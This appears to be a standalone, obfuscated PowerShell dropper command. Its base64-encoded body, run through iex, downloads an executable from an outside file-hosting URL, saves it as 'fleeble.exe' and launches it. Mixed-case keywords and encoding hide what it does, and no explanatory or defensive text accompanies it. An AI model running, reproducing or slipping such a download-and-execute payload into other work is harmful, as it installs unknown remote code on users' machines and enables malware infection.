iex([SYSTem.tEXt.encODing]::utf8.geTSTrinG([sySTem.cOnveRt]::frombAsE64StRIng('CihOZXctT2JqZWN0IFN5c3RlbS5OZVQuV2VCQ2xpRW5UKS5ET1dubE9BREZpTEUoJ2h0dHA6Ly9kZGwyLmRhdGEuaHUvZ2V0LzAvOTU4OTYyMS9rMDAwLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit

